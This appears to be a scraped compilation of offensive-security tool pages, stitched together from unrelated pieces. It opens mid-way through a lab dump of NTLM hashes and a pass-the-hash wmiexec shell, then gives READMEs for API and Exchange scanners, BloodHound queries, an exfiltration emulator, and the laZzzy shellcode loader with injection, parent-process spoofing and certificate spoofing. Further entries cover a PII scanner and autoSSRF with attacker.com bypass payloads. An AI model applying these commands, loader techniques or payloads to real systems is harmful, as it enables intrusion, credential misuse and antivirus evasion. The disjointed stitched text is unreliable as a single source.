NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
============
[+] Deleting DLL
[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|โ wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark
C:\>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivile ge Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
C:\>
Juan Manuel Fernรกndez (@TheXC3LL)
REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.
REST-Attacker is maintained by the Chair of Network & Data Security of the Ruhr University of Bochum.
REST-Attacker currently provides these features:
Get the tool by downloading or cloning the repository:
git clone https://github.com/RUB-NDS/REST-Attacker.git
You need Python >3.10 for running the tool.
You also need to install the following packages with pip:
python3 -m pip install -r requirements.txt
Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and other about available configuration options in our usage guides.
Get the list of supported test cases:
python3 -m rest_attacker --list
Basic test run (with load-time test case generation):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate
Full test run (with load-time and runtime test case generation + rate limit handling):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits
Test run with only selected test cases (only generates test cases for test cases scopes.TestTokenRequestScopeOmit
and resources.FindSecurityParameters
):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters
Rerun a test run from a report:
python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json
Usage guides and configuration format documentation can be found in the documentation subfolders.
For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.
Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code ammendments via a pull request.
Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.
This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.
ExchangeFinder is a simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange.
ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0
to Microsoft Exchange Server 2019
.
ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange server, then it will send a couple of HTTP requests to parse the content of the response sent by the server to identify if it's using Microsoft Exchange or not.
Currently, the tool has a signature of every version from Microsoft Exchange starting from Microsoft Exchange 4.0
to Microsoft Exchange Server 2019
, and based on the build version sent by Exchange via the header X-OWA-Version
we can identify the exact version.
If the tool found a valid Microsoft Exchange instance, it will return the following results:
Clone the latest version of ExchangeFinder
using the following command:
git clone https://github.com/mhaskar/ExchangeFinder
And then install all the requirements using the command poetry install
.
โโโ(kaliใฟkali)-[~/Desktop/ExchangeFinder]
โโ$ poetry install 1 โจฏ
Installing dependencies from lock file
Package operations: 15 installs, 0 updates, 0 removals
โข Installing pyparsing (3.0.9)
โข Installing attrs (22.1.0)
โข Installing certifi (2022.6.15)
โข Installing charset-normalizer (2.1.1)
โข Installing idna (3.3)
โข Installing more-itertools (8.14.0)
โข Installing packaging (21.3)
โข Installing pluggy (0.13.1)
โข Installing py (1.11.0)
โข Installing urllib3 (1.26.12)
โข Installing wcwidth (0.2.5)
โข Installing dnspython (2.2.1)
โข Installing pytest (5.4.3)
โข Installing requests (2.28.1)
โข Installing termcolor (1.1.0)< br/>
Installing the current project: ExchangeFinder (0.1.0)
โโโ(kaliใฟkali)-[~/Desktop/ExchangeFinder]
โโโ(kaliใฟkali)-[~/Desktop/ExchangeFinder]
โโ$ python3 exchangefinder.py
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[-] Please use --domain or --domains option
โโโ(kali 27;kali)-[~/Desktop/ExchangeFinder]
โโ$
You can use the option -h
to show the help banner:
To scan single domain you can use the option --domain
like the following:
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป python3 exchangefinder.py --domain dummyexchangetarget.com
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[!] Scanning domain dummyexch angetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.
[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://autodiscover.dummyexchangetarget.com Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป
To scan multiple domains (targets) you can use the option --domains
and choose a file like the following:
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป python3 exchangefinder.py --domains domains.txt
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records f ound for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.
[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.
[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5
askarโข/opt/redteaming/ExchangeFinder(mainโก)ยป
Please note that the examples used in the screenshots are resolved in the lab only
This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances, feel free to open PR if you find any issue or you have a new thing to add.
This project is licensed under the GPL-3.0 License - see the LICENSE file for details
A Python3
terminal application that contains 260+ Neo4j
cyphers for BloodHound data sets.
BloodHound
is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:
JSON
graphs, I need graph results in a line-by-line format .txt
fileThis tool can also help blue teams to reveal detailed information about their Active Directory environments as well.
Take back control of your BloodHound
data with cypherhound
!
grep/cut/awk
-friendly formatMake sure to have python3
installed and run:
python3 -m pip install -r requirements.txt
Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>
The full command menu is shown below:
Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the number of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu
Neo4j
database and URI
BloodHound 4.2.0
, certain edges will not work for previous versionsWindows
users must run pip3 install pyreadline3
raw
or not) due to their unpredictable number of nodesAzure
edgesPlease be descriptive with any issues you decide to open and if possible provide output (if applicable).
A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed w/o the usage of native API's. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.
Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below metioned progamming/scripting languages:
Download the latest ZIP from realease.
With SSl: python3 HTTP-S-EXFIL.py ssl
Without SSL: python3 HTTP-S-EXFIL.py
CNet.exe <Server-IP-ADDRESS>
- Select any optionChashNet.exe <Server-IP-ADDRESS>
- Select any option.\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
Nt*
) functions (not all functions but most)\x90
)Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer
> Individual Components
:
C++ Clang Compiler for Windows
and C++ Clang-cl for build tools
ClickOnce Publishing
Python3 and the required modules:
python3 -m pip install -r requirements.txt
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃโฃโฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃ โฃคโฃคโฃคโฃคโ โขโฃผโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โขโฃโฃโกโ โ โ โขโฃโฃโฃโฃโฃโกโ โขโฃผโกฟโ โ โ โ โ โ โขโฃโกโ โ โ โฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฐโฃพโ โ โ โขปโฃฟโ โ โ โ โขโฃฟโฃฟโ โ โฃ โฃฟโฃฏโฃคโฃคโ โ โ โ โ โ โขฟโฃทโกโ โฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฟโฃฏ โ โ โขธโฃฟโ โ โ โฃ โฃฟโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โขฟโฃงโฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ ฟโฃทโฃฆโฃดโขฟโฃฟโ โขโฃพโฃฟโฃฟโฃถโฃถโฃถโ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃฟโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃผโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ by: CaptMeeloโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)
shellcode execution method:
1 Early-bird APC Queue (requires sacrificial proces)
2 Thread Hijacking (requires sacrificial proces)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard
Execute builder.py
and supply the necessary data.
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃโฃโฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃ โฃคโฃคโฃคโฃคโ โข โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โขโฃโฃโกโ โ โ โขโฃโฃโฃโฃโฃโกโ โขโฃผโกฟโ โ โ โ โ โ โขโฃโกโ โ โ โฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฐโฃพโ โ โ โขปโฃฟโ โ โ โ โขโฃฟโฃฟโ โ โฃ โฃฟโฃฏโฃคโฃคโ โ โ โ โ โ โขฟโฃทโกโ โฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฟโฃฏโ โ โ โขธโฃฟโ โ โ โฃ โฃฟโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โขฟโฃงโฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ ฟโฃทโฃฆโฃดโขฟโฃฟโ โขโฃพโฃฟโฃฟโฃถโฃถโฃถโ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃฟโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃผโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ by: CaptMeeloโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe
[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: ยฉ Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoftยฎ Windowsยฎ Operating System
[*] ProductVersion: 10.0.22621.608
[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe
Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.
Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:
The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.
A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:
Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.
Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.
Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.
Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.
As a final verification method, images are scanned for certain strings to verify the accuracy of the model.
The accuracy of the scan can determined via the confidence scores in output. If all the mentioned conditions are met, a score of 100.0 is returned.
To train the model, data can also be fed into the model_generator.py
script, and the newly improved h5 file can be used.
pip install -r requirements.txt
.sudo apt install tesseract-ocr -y
(for Ubuntu/Debian).python3 octopii.py <location name>
, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>
Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.
Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:
Fork the official repository at https://github.com/redhuntlabs/octopii
There are 3 files in the models/
directory. - The keras_models.h5
file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python. - The labels.txt
file contains the list of labels corresponding to the index that the model returns. - The ocr_list.json
file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.
Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:
Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.
Note: Only upload the same as the class name, for example, the German Passport class must have German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.
keras_model.h5
file and labels.txt
file into the models/
directory in Octopii.The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.
Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:
ocr_list.json
file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
keywords
, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.ocr_list.json
file.You can replace each file you modify in the models/
directory after you create or edit them via the above methods.
Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.
Note: Please take the following steps to ensure quality
ocr_list.json
.(c) Copyright 2022 RedHunt Labs Private Limited
Author: Owais Shaikh
autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Different from other ssrf automation tools, this one comes with the two following original features :
Smart fuzzing on relevant SSRF GET parameters
When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=
, ?uri=
, ..) and doesnโt interfere with everything else. This ensures that the original URL is still correctly understood by the tested web-application, something that might doesnโt happen with a tool which is blindly spraying query parameters.
Context-based dynamic payloads generation
For the given URL : https://host.com/?fileURL=https://authorizedhost.com
, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web-application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. It would result to interesting payloads such as : http://authorizedhost.attacker.com
, http://authorizedhost%252F@attacker.com
, etc.
Furthermore, this tool guarantees almost no false-positives. The detection relies on the great ProjectDiscoveryโs interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.
python3 autossrf.py -h
This displays help for the tool.
usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]
options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode
Single URL target:
python3 autossrf.py -u https://www.host.com/?param1=X¶m2=Y¶m2=Z
Multiple URLs target with verbose:
python3 autossrf.py -f urls.txt -v
1 - Clone
git clone https://github.com/Th0h0/autossrf.git
2 - Install requirements
Python libraries :
cd autossrf
pip install -r requirements.txt
Interactsh-Client :
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
autoSSRF is distributed underย MIT License.
This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.
xnLinkFinder supports Python 3.
$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install
Arg | Long Arg | Description |
---|---|---|
-i | --input | Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file. |
-o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. |
-op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. |
-ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. |
-sp | --scope-prefix | Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-spo | --scope-prefix-original | If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false) |
-sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-c | --cookies โ | Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
|
-H | --headers โ | Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
|
-ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output. |
-d | --depth โ | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix ) argument to ensure a request to links found without a domain can be attempted. |
-p | --processes โ | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25) |
-x | --exclude | Additional Link exclusions (to the list in config.yml ) in a comma separated list, e.g. careers,forum
|
-orig | --origin | Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false) |
-t | --timeout โ | How many seconds to wait for the server to send data before giving up (default: 10 seconds) |
-inc | --include | Include input (-i ) links in the output (default: false) |
-u | --user-agent โ | What User Agents to get links for, e.g. -u desktop mobile
|
-insecure | โ | Whether TLS certificate checks should be disabled when making requests (delfault: false) |
-s429 | โ | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) |
-s403 | โ | Stop when > 95 percent of responses return 403 Forbidden (default: false) |
-sTO | โ | Stop when > 95 percent of requests time out (default: false) |
-sCE | โ | Stop when > 95 percent of requests have connection errors (default: false) |
-m | --memory-threshold | The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) |
-mfs | --max-file-size โ | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size os over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size.. |
-replay-proxy | โ | For active link finding with URL (or file of URLs), replay the requests through this proxy. |
-ascii-only | Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. | |
-v | --verbose | Verbose output |
-vv | --vverbose | Increased verbose output |
-h | --help | show the help message and exit |
โ NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE
The config.yml
file has the keys which can be updated to suit your needs:
linkExclude
- A comma separated list of strings (e.g. .css,.jpg,.jpeg
etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.contentExclude
- A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg
etc.) that all responses Content-Type
headers are checked against. Any responses with the these content types will be excluded and not checked for links.fileExtExclude
- A comma separated list of strings (e.g. .zip,.gz,.tar
etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.regexFiles
- A list of file types separated by a pipe character (e.g. php|php3|php5
etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
respParamLinksFound
โ - Whether to get potential parameters from links found in responses: True
or False
respParamPathWords
โ - Whether to add path words in retrieved links as potential parameters: True
or False
respParamJSON
โ - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True
or False
respParamJSVars
โ - Whether javascript variables set with var
, let
or const
are added as potential parameters: True
or False
respParamXML
โ - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True
or False
respParamInputField
โ - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True
or False
respParamMetaName
โ - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True
or False
โ IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True
python3 xnLinkFinder.py -i target.com
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile
) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d
) will keep sending request to links found on the previous depth search to find more links.
